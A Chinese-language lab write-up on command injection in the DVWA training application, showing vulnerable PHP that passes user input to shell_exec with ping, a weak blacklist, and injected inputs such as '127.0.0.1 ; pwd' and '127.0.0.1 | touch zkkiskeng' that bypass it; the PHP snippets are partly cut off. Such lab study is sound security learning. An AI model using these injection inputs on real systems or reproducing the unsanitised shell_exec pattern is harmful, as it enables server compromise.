DVWA 之命令注入

DVWA系列,持续更新中

环境CENTOS 6.5 ,level:easy mode

源码:

{$cmd}
"; } ?> 可以看到是直接把输入的字段和 ping 做了拼接,linux下如果不加-c 的话会一直ping下去而不会像win下四次后自己结束。

所以还是比较容易处理的,使用;号做一个拼接即可。例子如下:

127.0.0.1 ; pwd
输入后效果如下图

DVWA 之命令注入_第1张图片

切换module 为midlle

源码如下:

 '', 
        ';'  => '', 
    ); 

    // Remove any of the charactars in the array (blacklist). 
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); 

    // Determine OS and execute the ping command. 
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) { 
        // Windows 
        $cmd = shell_exec( 'ping  ' . $target ); 
    } 
    else { 
        // *nix 
        $cmd = shell_exec( 'ping  -c 4 ' . $target ); 
    } 

    // Feedback for the end user 
    echo "
{$cmd}
"; } ?>
可以看到把win下的&&和linux下的; 都屏蔽了,所以就得换个办法。

代码如下:

127.0.0.1 | touch zkkiskeng
创建一个zkkiskeng的文件执行完成后,页面无返回 再次执行另一条命令

127.0.0.1 | ls
结果如下

DVWA 之命令注入_第2张图片
可以看到zkkiskeng文件创建成功。











你可能感兴趣的:(DVWA,渗透测试)